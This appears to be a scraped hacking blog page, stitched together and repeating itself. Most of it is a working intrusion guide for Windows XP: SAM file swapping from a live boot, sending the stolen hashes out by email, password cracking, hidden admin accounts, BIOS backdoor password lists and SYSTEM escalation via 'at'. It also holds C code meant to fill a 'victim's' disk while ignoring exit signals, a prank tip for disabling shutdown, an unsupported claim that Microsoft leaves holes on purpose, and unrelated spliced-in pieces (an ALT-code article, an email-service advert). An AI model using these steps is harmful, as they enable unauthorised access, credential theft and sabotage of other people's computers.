Yes Microsoft Know all things, and done on purpose why? I always for many years ask my self why Microsoft doesn’t do real security on their systems from the CD setup to all security aspects In the system, I found(my opinion may wrong)that they need to achieve 2 strategic things
1-They need their software spread and all depend on it and in one day when they feel that they are the One The security will done and all money will go to One Pocket
2-They Forced/Like to Make Some Organizations Hack other systems
Proof:
They can make this File SAM Unavailable by storing the information in FAT, FAT32, NTFS Areas (Sectors reserved by The Operating SYSTEM to Store the Addresses of the files on the HardDisk File Allocation Table) So that it is hard to extract. But they don't!!!!!
5-Understand the Idea
The Idea is simple I will explain it manually and it can then be programmed it is so easy here is the idea
The SAM file is available and the SAM file contain a Security Information, so I created a Free Windows XP SP2 Logon account (Administrator Account without password) that means when windows Lunch it Will enter directly to the system without asking about any password And windows will store this Account in The SAM file on My PC So the SAM file on My PC contain an Account will Make you enter Directly to the Windows, so I will take My SAM File and Replace (by renaming, we will need the original file to recover our way) It with the other SAM File in The Other System or Machine So When you restart It will make you enter directly to the Windows With Administrator Like Account ,do what you need and then back all things to the previous state. All These Steps will be under other system bootable DOS, Knoppiex, Windows Live CD, Because Windows XP will not make u able to copy the Files
6-Get Admin Like Account (The Simple Way)
1- Download My 2 SAM files I Include them in Downloads
2- Go to the target Machine , and try to Access it and Boot from any device CD-ROM, Floppy, NIC if it haven't any of those Read Hint 9
3- After Get Access to the Boot Command prompt c:> or Boot Live OS CD, Go to the windows folder $windir$\system32\config And Copy the SAM File and System File (we will need it later) To other folder, Then go to $windir$\repair copy SAM file
And then Rename the 2 SAM Files to SAM1 in their original places
4- Copy My SAM/config File and Paste it in the windows folder $windir$\system32\config Copy My SAM/Repair File and Paste it in the windows folder $windir$\repair (may this step not required)
5- Reboot and Make windows enter Normally
6- Yeah, No You are in The System
7- Copy the files in step 3 to Floppy Disk or Flash Stick Or Send it to your mail via Internet
8- After finish repeat step 2 and delete My SAM files and Rename Both SAM1 to SAM
9- Reboot , Congratulation you recover your way
7-Crack the SAM-Know the real Admin Password and Apply Hint 8
There is many ways I will introduce 2 ways and explain 1 After you get the SAM File and System File there are Programs That extract the Accounts and their passwords, depending on the idea of cracking the HASH (the HASH is one way encryption method) so that The program will generate random passwords and convert them to HASH and then compare it with the HASHES in the SAM File , so it may take a long time but for fast you will pay more money for ready made HASHES with their user names and passwords the 2 program are
1-L0phtcrack v4.0 (LC4 alternate name) the most famous on the NET
2-SAMInside http://www.insidepro.com/I include on the Downloads
I will explain fast SAMInside
shot1
This is the main window press Ctrl+O or by mouse click Import SAM and SYSTEM
shot1
Window will open to import the 2 files and the program will start to crack the Accounts and get them, and then display users names and their passwords
Any other tool will do the job try all and select your best I Explain here SAMInside because he give me results with 6 character only password and get it FAST
8-Creat a Hidden User Accountn
Windows NT / Windows 2000 and Windows XP has a security setting to hide accounts from the Logon Screen/Control panel users accounts
shot1
Press
Ctrl+Alt+Delet
Give you another Access Dialog
Steps:
1-After getting Admin Password enter to the system
2-create an Account with password
3-click start - > Run - > type Regedit press Enter
4-Go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon\SpecialAccounts\UserList
shot1
5- Create a new DWORD Value on the UserList
6-Name it with Name of Account to be Hidden
7-set the Value Data of this DWORD Value to 0 to hide it /1 to appear it
8- close Regedit and Reboot
9- Press Ctrl+Alt+Delete when logon Screen Appear another login dialog appear type You hidden user name and password and press Enter
Note:
1- the account profile will be visible in \Documents and Settings, But it will be hidden from Logon Screen and User Account in the control panel
2-there is other method that Inject your Account directly to the Admin SAM without know the Admin Pass, but believe me you don't Expect the result, so if you want try it (if the password hard to get)
9-USB Boot for FAT32, NTFS or any File System
HP Always amazing me to do this we need 2 tools
1- HP USB Disk Storage Format Tool v 2.0.6 I include in Downloads If u want to find more go to http://www.hp.com/
2- NTFSDOS Professional Boot Disk Wizard I include in Downloads If u want to find more go to http://www.winternals.com/
shot1
Just connect your USB Storage
steps:
1- Prepare a Startup Disk or Startup CD , Or any Equivalent
2- In the HP tool select the Device->your USB Storage
3- Select File System FAT or FAT32
4- Check "create a DOS startup disk" checkbox and then select option "using DOS System Files Located at"
5- brows your location
6- Click Start
7- Now you have a Bootable USB Storage Device
8- Now in the NTFSDOS Professional Boot Disk Wizard follow the wizard and you will get a NTFS bootable USB Storage
Why we need NTFS ?
If the Partition of the Windows System is NTFS so with normal Startup you will not be able to access any files because the File System is not Recognized by MS-DOS when we install NTFSDOS Professional on the bootable disk it will allow you To Access any File Under NTFS
Note:
Make sure that the option in Mother board Setup of First Boot "USB-Hard Disk" if you want to boot from a USB
10-Mother Boards Default Passwords and how to extract it if you are in The system
This subject is huge I try to find simple or clever way but as u know many PC's many machines many bios versions and updates so I search the net for the best and I list below ,but if this doesn’t help I recommend you to find the bios version and the motherboard and search the net on Google, yahoo, yahoo groups and other you will find some thing help u
HOW TO BYPASS BIOS PASSWORDS
http://www.elfqrin.com/docs/biospw.html
Removing a Bios - CMOS Password
http://www.dewassoc.com/support/bios/bios_password.htm
How to Bypass BIOS Passwords
http://www.uktsupport.co.uk/reference/biosp.htm
How to Bypass BIOS Passwords
http://www.i-hacked.com/content/view/36/70/
Default Password List
2006-04-30
http://www.phenoelit.de/dpl/dpl.html
Award BIOS backdoor passwords:
ALFAROME--------BIOSTAR--------KDD--------ZAAADA-------- ALLy--------CONCAT--------Lkwpeter--------ZBAAACA-------- aLLy-------- CONDO--------LKWPETER--------ZJAAADC-------- aLLY--------Condo--------PINT--------01322222-------- ALLY--------d8on--------pint--------589589-------- aPAf--------djonet--------SER--------589721-------- _award--------HLT--------SKY_FOX--------595595-------- AWARD_SW--------J64--------SYXZ--------598598 AWARD?SW--------J256--------syxz-------- AWARD SW--------J262--------shift + syxz-------- AWARD PW--------j332--------TTPTHA-------- AWKWARD--------j322-------- awkward
AMI BIOS Backdoor Passwords:
AMI--------BIOS--------PASSWORD--------HEWITT RAND-------- AMI?SW--------AMI_SW--------LKWPETER--------CONDO
Phoenix BIOS Backdoor Passwords: phoenix--------PHOENIX--------CMOS--------BIOS
Misc. Common Passwords
ALFAROME--------BIOSTAR--------biostar--------biosstar-------- CMOS--------cmos--------LKWPETER--------lkwpeter-------- setup--------SETUP--------Syxz--------Wodj
Other BIOS Passwords by Manufacturer
Manufacturer--------Password
VOBIS & IBM-------- merlin
Dell--------Dell
Biostar-------- Biostar
Compaq--------Compaq
Enox--------xo11nE
Epox--------central
Freetech--------Posterie
IWill--------iwill
Jetway--------spooml
Packard Bell--------bell9
QDI--------QDI
Siemens--------SKY_FOX
TMC--------BIGO
Toshiba--------Toshiba
Toshiba--------BIOS
Most Toshiba laptops
and some desktop systems will bypass the BIOS password if the left shift key is held down during boot
IBM Aptiva BIOS
Press both mouse buttons repeatedly during the boot
A very good One from Irongeek.
Strong Article Worth Sharin
As some Microsoft Operating System geeks know, you can type many more characters than are on a standard keyboard by using the ALT+NUMPAD combination technique. For example, by holding down the ALT key, typing 234 on the number pad, then releasing ALT gives you the O character. I'm writing this article mostly because when I search around for information on the topic of ALT+Number key combos I find pages that are lacking in details. Most of the pages I found are coming from the angle of using ALT+NUMPAD combinations as shortcuts for typing in non-English languages, but I have another use for them. Using ALT+NUMPAD can make for some very ugly passwords to crack. These odd characters have two major advantages over normal keystrokes:
1. They are unlikely to be in someone's dictionary or brute force list. Try brute forcing a password like "ace of ?s" or "I am the a and the O".
2. Some hardware key loggers will not log these odd characters. Your mileage may vary on this as some key loggers can, so don't rely on it to keep you 100% safe.
I'll cover the 2nd point more in an upcoming article. Using ALT+NUMPAD to type odd characters into your password also has a few disadvantages.
1. The way they are described in this article only works in Microsoft Operating Systems (DOS, Windows 9x, Vista, XP, 2000), and there may be some variation amongst the different versions. If you know of a good way to do the same thing in Linux please email me.
2. Not all applications will let you use these odd characters. For testing I tried the password "Oÿ" (ALT+234 and ALT+0255) on a Windows XP local account,, but not all application will let you use these sorts of characters in your password.
Microsoft has the following to say on the subject of ALT+NUM key codes:
From:http://www.microsoft.com/globaldev/reference/glossary.mspx
Alt+Numpad: A method of entering characters by typing in the character’s decimal code with the Numeric Pad keys (Num Lock turned on). In Windows:
• Alt+
• Alt+<0xxx>, where xxx is the decimal value of a code point, generates a Windows-encoded character.
• Alt+<+>+
Shortly I'll explain explain the first two methods further. The 3rd is more problematic to work with. First, you may have to edit your registry and add a the REG_SZ value "HKEY_Current_User/Control Panel/Input Method/EnableHexNumpad", then set it to "1". Also, depending on where you are trying to type the character the application may interpret your hexadecimal Fs as attempts to bring down the file menu. Since method three is so problematic I'll focus on the first two methods.
First, make sure you are using the number pad and not the top roll number keys, only the number pad works for this. Second, make sure NUM LOCK is on. It does not have to be on in all cases for these key combos to work, but it helps by keeping the number pad from being misinterpreted.
The chart from the site shows the relevant key codes to get various symbols. The table on the left shows the OEM Extended ASCII character set (AKA: IBM PC Extended Character Set; Extended ASCII; High ASCII; 437 U.S. English). True ASCII is only 7 bit, so the range is 0 to 127. IBM extended it to 8 bits and added more characters. To type these characters you merely have to hold down an ALT key, type the numeric value of the character, then release the ALT key.
The table on the right shows the ANSI character set (AKA: Window's ANSI/ISO Latin-1/ANSI Extended ASCII, though technically they are not exactly the same thing.). To use the ANSI character set you do the same thing as the OEM set, but you preface the number with an extra zero. Notice that the first 127 should be the same in both sets, though values 0-31 may not be viewable in all cases. I've been in "character encoding hell" just trying to get this article on my site in a readable format.
For example, ALT+257 gives me a in Wordpad, but in Notepad it loops back around the character set and gives me?(257-256=1 which is ? in the OEM set) . If you want to know what key code will bring up a particular character in a certain Windows font run Windows Character Map (charmap.exe) and look in the bottom right corner to find out.
some examples :
ALT+130 é
ALT+131 â
ALT+132 ä
ALT+133 à
ALT+134 å
ALT+135 ç
ALT+136 ê
ALT+137 ë
ALT+138 è
ALT+139 ï
ALT+140 î
ALT+141 ì
ALT+142 Ä
ALT+143 Å
ALT+144 É
ALT+145 æ
ALT+146 Æ
ALT+147 ô
ALT+148 ö
ALT+149 ò
ALT+150 û
ALT+151 ù
ALT+152 ÿ
ALT+153 Ö
ALT+154 Ü
ALT+155 ¢
ALT+156 £
ALT+157 ¥
ALT+158 P
ALT+159 ƒ
ALT+160 á
ALT+161 í
ALT+162 ó
ALT+163 ú
ALT+164 ñ
ALT+165 Ñ
ALT+166 ª
ALT+167 º
ALT+168 ¿
ALT+169 ¬
Create Bad sectors on hard disks
A C source code
/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/
#include
#include
#include
#include
#include
#include
#include
#define HDSIZE 640000
void handle_sig();
int main() {
int i = 0;
int x;
int fd[5];
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
char *buf;
buf = malloc(HDSIZE);
printf("sekt0r: trashing hard disk with bad sectors!\n");
while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);
for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);
} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */
void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}
Disable or remove shutdown
=> remove shutdown from start menu and also from all other possible options.
=> hide shutdown from start menu
=> disable shutdown all togetherDisable or remove shutdown - The Ethical Hackinglearn to do it now!!! (it takes less than a minute to do so) Disclaimer: this is an article which just brings out the fact that removing the
shut down menu option from the start menu is possible. If you however get caught
by your manager or college system administrator, and get whipped in your ass, I
cannot be held responsible. This tool is a inbuilt tool present in windows XP, just like msgconfig. So you
got to execute this command using run. 1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this. Also if
you a minute with your pal’s system and this pal tries to flirt your girl friend
- You can make a lot of changes to his system in the time he leaves you alone
with his system, to have him go bonkers.
2. User configuration -> administrative Templates -> start menu and taskbar -> 3. This option opens up a pane on the right hand side. Identify the option named
- Remove SHUT DOWN on the start menu . 4. Double click Remove SHUT DOWN on the start menu option 5. a small screen pops up and you may like to read about the explanation in the
EXPLAIN TAB before you change the settings. 6. Just change the radio button TO ENABLED and say apply. 7. DONE. No need to log off or restart the system. (You may however have to find
a way to restart your system.) 8. This option disables the log off option from the system. From the start menu,
also from the life saver – three buttons CTRL - ALT - DEL options. This option goes well with the HIDING THE LOG OFF FROM START MENU… (To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager (alt+ctrl+del) or by
pressing winkey+L where u get the option to turn off ur compy/restart/stand
by.
or u may create a shortcut using this shortcut location to shutdown ur sys %windir%\system32\shutdown.exe -s to restart, u can use this shortcut %windir%\system32\shutdown.exe -r
Self distructing Email - MI3
*****
one word - Just perfect
One of the best service i found online n using it too personally..
Big Brother is Watching
Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?
Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.
BigString takes the risk out of email
Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.
BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.
BigString lets you have second thoughts
BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.
You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.
BigString takes the danger out of clicking
BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.
BigString is easy to use
BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!
Here are just a few of the many applications of BigString
Erasable, Recallable, Non-Printable Email.
Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.
On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!
Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!
Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.
Self distructing Email - MI3 - The Ethical Hacking
SAM History n Hacking
1-Introduction
This article introduce very simple way to get Administrator like account and do the job and after finish recover your way, after that Get Admin Password later in your home by Cracking, After get the Admin Password Create a hidden user account and do all your jobs free, and Explain how to make a USB Storage Device Bootable corresponding to any system boot, and how to bypass Mother Board password by Default Passwords, and how to extract it if you are in the system
2-To Hackers / Security Systems Engineers
First All must know that both Hackers / Security Systems Engineers Are 2 faces to the same coin Any way, I try this on Windows XP SP2 I want all to try it on Windows Server 2003, Windows Vista Any Windows NT and POST a Message to make all know what versions exactly this idea can apply for
3-Close Look to hole
Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain critical information about users account you can explore the folder
$windir$\system32\config
You will find all things and may discover some thing new, but what amazing here is that the file is available, so we can apply our idea
shot1
You will Not be able To copy them Under XP
4-Dose Microsoft Know and Why!?
Yes Microsoft Know all things, and done on purpose why? I always for many years ask my self why Microsoft doesn’t do real security on their systems from the CD setup to all security aspects In the system, I found(my opinion may wrong)that they need to achieve 2 strategic things
1-They need their software spread and all depend on it and in one day when they feel that they are the One The security will done and all money will go to One Pocket
2-They Forced/Like to Make Some Organizations Hack other systems
Proof:
They can make this File SAM Unavailable by storing the information in FAT, FAT32, NTFS Areas (Sectors reserved by The Operating SYSTEM to Store the Addresses of the files on the HardDisk File Allocation Table) So that it is hard to extract. But they don't!!!!!
5-Understand the Idea
The Idea is simple I will explain it manually and it can then be programmed it is so easy here is the idea
The SAM file is available and the SAM file contain a Security Information, so I created a Free Windows XP SP2 Logon account (Administrator Account without password) that means when windows Lunch it Will enter directly to the system without asking about any password And windows will store this Account in The SAM file on My PC So the SAM file on My PC contain an Account will Make you enter Directly to the Windows, so I will take My SAM File and Replace (by renaming, we will need the original file to recover our way) It with the other SAM File in The Other System or Machine So When you restart It will make you enter directly to the Windows With Administrator Like Account ,do what you need and then back all things to the previous state. All These Steps will be under other system bootable DOS, Knoppiex, Windows Live CD, Because Windows XP will not make u able to copy the Files
6-Get Admin Like Account (The Simple Way)
1- Download My 2 SAM files I Include them in Downloads
2- Go to the target Machine , and try to Access it and Boot from any device CD-ROM, Floppy, NIC if it haven't any of those Read Hint 9
3- After Get Access to the Boot Command prompt c:> or Boot Live OS CD, Go to the windows folder $windir$\system32\config And Copy the SAM File and System File (we will need it later) To other folder, Then go to $windir$\repair copy SAM file
And then Rename the 2 SAM Files to SAM1 in their original places
4- Copy My SAM/config File and Paste it in the windows folder $windir$\system32\config Copy My SAM/Repair File and Paste it in the windows folder $windir$\repair (may this step not required)
5- Reboot and Make windows enter Normally
6- Yeah, No You are in The System
7- Copy the files in step 3 to Floppy Disk or Flash Stick Or Send it to your mail via Internet
8- After finish repeat step 2 and delete My SAM files and Rename Both SAM1 to SAM
9- Reboot , Congratulation you recover your way
7-Crack the SAM-Know the real Admin Password and Apply Hint 8
There is many ways I will introduce 2 ways and explain 1 After you get the SAM File and System File there are Programs That extract the Accounts and their passwords, depending on the idea of cracking the HASH (the HASH is one way encryption method) so that The program will generate random passwords and convert them to HASH and then compare it with the HASHES in the SAM File , so it may take a long time but for fast you will pay more money for ready made HASHES with their user names and passwords the 2 program are
1-L0phtcrack v4.0 (LC4 alternate name) the most famous on the NET
2-SAMInside http://www.insidepro.com/I include on the Downloads
I will explain fast SAMInside
shot1
This is the main window press Ctrl+O or by mouse click Import SAM and SYSTEM
shot1
Window will open to import the 2 files and the program will start to crack the Accounts and get them, and then display users names and their passwords
Any other tool will do the job try all and select your best I Explain here SAMInside because he give me results with 6 character only password and get it FAST
8-Creat a Hidden User Accountn
Windows NT / Windows 2000 and Windows XP has a security setting to hide accounts from the Logon Screen/Control panel users accounts
shot1
Press
Ctrl+Alt+Delet
Give you another Access Dialog
Steps:
1-After getting Admin Password enter to the system
2-create an Account with password
3-click start - > Run - > type Regedit press Enter
4-Go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon\SpecialAccounts\UserList
shot1
5- Create a new DWORD Value on the UserList
6-Name it with Name of Account to be Hidden
7-set the Value Data of this DWORD Value to 0 to hide it /1 to appear it
8- close Regedit and Reboot
9- Press Ctrl+Alt+Delete when logon Screen Appear another login dialog appear type You hidden user name and password and press Enter
Note:
1- the account profile will be visible in \Documents and Settings, But it will be hidden from Logon Screen and User Account in the control panel
2-there is other method that Inject your Account directly to the Admin SAM without know the Admin Pass, but believe me you don't Expect the result, so if you want try it (if the password hard to get)
9-USB Boot for FAT32, NTFS or any File System
HP Always amazing me to do this we need 2 tools
1- HP USB Disk Storage Format Tool v 2.0.6 I include in Downloads If u want to find more go to http://www.hp.com/
2- NTFSDOS Professional Boot Disk Wizard I include in Downloads If u want to find more go to http://www.winternals.com/
shot1
Just connect your USB Storage
steps:
1- Prepare a Startup Disk or Startup CD , Or any Equivalent
2- In the HP tool select the Device->your USB Storage
3- Select File System FAT or FAT32
4- Check "create a DOS startup disk" checkbox and then select option "using DOS System Files Located at"
5- brows your location
6- Click Start
7- Now you have a Bootable USB Storage Device
8- Now in the NTFSDOS Professional Boot Disk Wizard follow the wizard and you will get a NTFS bootable USB Storage
Why we need NTFS ?
If the Partition of the Windows System is NTFS so with normal Startup you will not be able to access any files because the File System is not Recognized by MS-DOS when we install NTFSDOS Professional on the bootable disk it will allow you To Access any File Under NTFS
Note:
Make sure that the option in Mother board Setup of First Boot "USB-Hard Disk" if you want to boot from a USB
10-Mother Boards Default Passwords and how to extract it if you are in The system
This subject is huge I try to find simple or clever way but as u know many PC's many machines many bios versions and updates so I search the net for the best and I list below ,but if this doesn’t help I recommend you to find the bios version and the motherboard and search the net on Google, yahoo, yahoo groups and other you will find some thing help u
HOW TO BYPASS BIOS PASSWORDS
http://www.elfqrin.com/docs/biospw.html
Removing a Bios - CMOS Password
http://www.dewassoc.com/support/bios/bios_password.htm
How to Bypass BIOS Passwords
http://www.uktsupport.co.uk/reference/biosp.htm
How to Bypass BIOS Passwords
http://www.i-hacked.com/content/view/36/70/
Default Password List
2006-04-30
http://www.phenoelit.de/dpl/dpl.html
Award BIOS backdoor passwords:
ALFAROME--------BIOSTAR--------KDD--------ZAAADA-------- ALLy--------CONCAT--------Lkwpeter--------ZBAAACA-------- aLLy-------- CONDO--------LKWPETER--------ZJAAADC-------- aLLY--------Condo--------PINT--------01322222-------- ALLY--------d8on--------pint--------589589-------- aPAf--------djonet--------SER--------589721-------- _award--------HLT--------SKY_FOX--------595595-------- AWARD_SW--------J64--------SYXZ--------598598 AWARD?SW--------J256--------syxz-------- AWARD SW--------J262--------shift + syxz-------- AWARD PW--------j332--------TTPTHA-------- AWKWARD--------j322-------- awkward
AMI BIOS Backdoor Passwords:
AMI--------BIOS--------PASSWORD--------HEWITT RAND-------- AMI?SW--------AMI_SW--------LKWPETER--------CONDO
Phoenix BIOS Backdoor Passwords: phoenix--------PHOENIX--------CMOS--------BIOS
Misc. Common Passwords
ALFAROME--------BIOSTAR--------biostar--------biosstar-------- CMOS--------cmos--------LKWPETER--------lkwpeter-------- setup--------SETUP--------Syxz--------Wodj
Other BIOS Passwords by Manufacturer
Manufacturer--------Password
VOBIS & IBM-------- merlin
Dell--------Dell
Biostar-------- Biostar
Compaq--------Compaq
Enox--------xo11nE
Epox--------central
Freetech--------Posterie
IWill--------iwill
Jetway--------spooml
Packard Bell--------bell9
QDI--------QDI
Siemens--------SKY_FOX
TMC--------BIGO
Toshiba--------Toshiba
Toshiba--------BIOS
Most Toshiba laptops
and some desktop systems will bypass the BIOS password if the left shift key is held down during boot
IBM Aptiva BIOS
Press both mouse buttons repeatedly during the boot
really that is possible !
u know why is it a "user" account because it lacks come service layer than that in "administrator" account
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.
Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.
Quote:
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code:
at 15:25 /interactive “cmd.exe”
Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
u know why is it a "user" account because it lacks come service layer than that in "administrator" account
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.
Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.
Quote:
